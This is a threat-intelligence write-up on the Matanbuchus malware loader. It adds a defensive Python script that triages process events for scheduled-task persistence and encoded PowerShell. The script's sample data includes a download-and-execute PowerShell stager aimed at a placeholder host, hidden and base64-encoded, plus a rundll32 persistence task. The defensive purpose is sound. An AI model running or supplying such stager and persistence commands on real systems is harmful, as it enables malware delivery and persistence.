Matanbuchus: Malware-as-a-Service with Demonic Intentions

Unit 42 researchers often spend time investigating what we call non-traditional sources: underground forums and marketplaces, ranging from forums on the Tor network to Telegram channels. One such case that we investigated involves a threat actor called BelialDemon, who is a member of several underground forums and marketplaces.

In February 2021, BelialDemon advertised a new malware-as-a-service (MaaS) called Matanbuchus Loader and charged an initial rental price of $2,500. Malware loaders are malicious software that typically drop, or pull down from command and control (C2) infrastructure, a second-stage payload. Matanbuchus has the following capabilities:

  • The ability to launch a .exe or .dll file in memory.
  • The ability to leverage schtasks.exe to add or modify task schedules.
  • The ability to launch custom PowerShell commands.
  • The ability to leverage a standalone executable to load the DLL if the attacker otherwise has no way of doing so.
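The schtasks.exe and PowerShell capabilities above both surface in process-creation telemetry (Sysmon Event ID 1, Windows Security Event ID 4688), so a defender can triage them from command lines alone. The following Python is an added example written for this page, not code from the Unit 42 post or from Matanbuchus: the three event records are constructed, the script-host, parent-process and user-writable-path lists are assumed heuristics rather than indicators from the post, and the decoded-script pattern is generic. It parses schtasks /create and /change invocations, decodes PowerShell -EncodedCommand arguments (base64 over UTF-16LE text), and returns the reasons each event was flagged.

```python
"""Triage of process-creation events for two loader behaviours named above:
schtasks.exe persistence and custom PowerShell execution. Added example; the
events, lists and patterns below are constructed assumptions, not post IOCs."""
import base64
import re

# Constructed Sysmon-style (Event ID 1) records trimmed to three fields; the
# encoded command is built here so the sample decodes to a known string.
PS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
PS_ENC = base64.b64encode(PS_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 5 /tn "Updater" '
                r'/tr "rundll32.exe C:\Users\alice\AppData\Roaming\upd.dll,Entry" /f'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc " + PS_ENC},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks.exe /create /sc daily /st 02:00 /tn "Backup" '
                r'/tr "C:\Program Files\Backup\backup.exe"'},
]
# Heuristic lists (assumed for this example, not taken from the post).
SCRIPT_HOSTS = {"rundll32", "regsvr32", "mshta", "wscript", "cscript", "powershell", "pwsh", "cmd"}
ODD_PARENTS = {"rundll32", "regsvr32", "mshta", "wscript", "cscript", "winword", "excel", "outlook"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads)\\", re.I)
STAGER = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string", re.I)


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path):
    """Lower-case file name without directory or .exe suffix."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def parse_schtasks(cmdline):
    """Return the verb (create/change) plus the /tn and /tr arguments."""
    toks = tokenize(cmdline)
    info = {"verb": None, "tn": None, "tr": None}
    for i, t in enumerate(toks):
        low = t.lower()
        if low in ("/create", "/change"):
            info["verb"] = low[1:]
        elif low in ("/tn", "/tr") and i + 1 < len(toks):
            info[low[1:]] = toks[i + 1]
    return info


def decode_encoded_command(cmdline):
    """Decode -EncodedCommand (PowerShell also accepts prefixes like -e, -ec,
    -enc): base64 of UTF-16LE text. Returns None when absent or malformed."""
    toks = tokenize(cmdline)
    for i, t in enumerate(toks[:-1]):
        flag = t[1:].lower()
        if t[:1] in "-/" and flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def assess_schtasks(event):
    """Reasons a schtasks.exe launch looks like loader persistence ([] = benign)."""
    info = parse_schtasks(event["cmdline"])
    if info["verb"] is None:
        return []
    reasons, action = [], info["tr"] or ""
    first = tokenize(action)  # nested quoted paths with spaces are not handled
    if first and basename(first[0]) in SCRIPT_HOSTS:
        reasons.append(f"task action runs script host {basename(first[0])}")
    if USER_WRITABLE.search(action):
        reasons.append("task action points into a user-writable directory")
    if basename(event["parent"]) in ODD_PARENTS:
        reasons.append(f"/{info['verb']} spawned by {basename(event['parent'])}")
    return reasons


def assess_powershell(event):
    """Reasons a PowerShell launch looks like loader-driven execution."""
    reasons = []
    toks = [t.lower() for t in tokenize(event["cmdline"])]
    for i, t in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if t in ("-nop", "-noprofile", "-noni", "-noninteractive"):
            reasons.append(f"stealth switch {t}")
        elif t in ("-w", "-windowstyle") and nxt == "hidden":
            reasons.append("hidden window")
        elif t in ("-ep", "-executionpolicy") and nxt == "bypass":
            reasons.append("execution policy bypass")
    script = decode_encoded_command(event["cmdline"])
    if script is not None:
        reasons.append("encoded command")
        if STAGER.search(script):
            reasons.append("decoded script downloads or evaluates content")
    if basename(event["parent"]) in ODD_PARENTS:
        reasons.append(f"spawned by {basename(event['parent'])}")
    return reasons


def triage(events):
    """Map event index -> reasons for every event that trips a heuristic."""
    checks = {"schtasks": assess_schtasks, "powershell": assess_powershell, "pwsh": assess_powershell}
    return {i: r for i, ev in enumerate(events)
            if (r := checks.get(basename(ev["image"]), lambda e: [])(ev))}
```

Calling triage(SAMPLE_EVENTS) reports the rundll32-spawned task whose action loads a DLL out of AppData and the hidden, encoded PowerShell launch, and stays silent on the cmd.exe-spawned backup task. Two caveats for real deployments: the tokenizer does not handle quoted paths nested inside a /tr argument, and tasks registered from XML (schtasks /create /xml) or through the Task Scheduler COM API never pass through a schtasks.exe command line, so a production detection should also watch the TaskScheduler operational log or Security Event ID 4698 (scheduled task created).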

Source: Palo Alto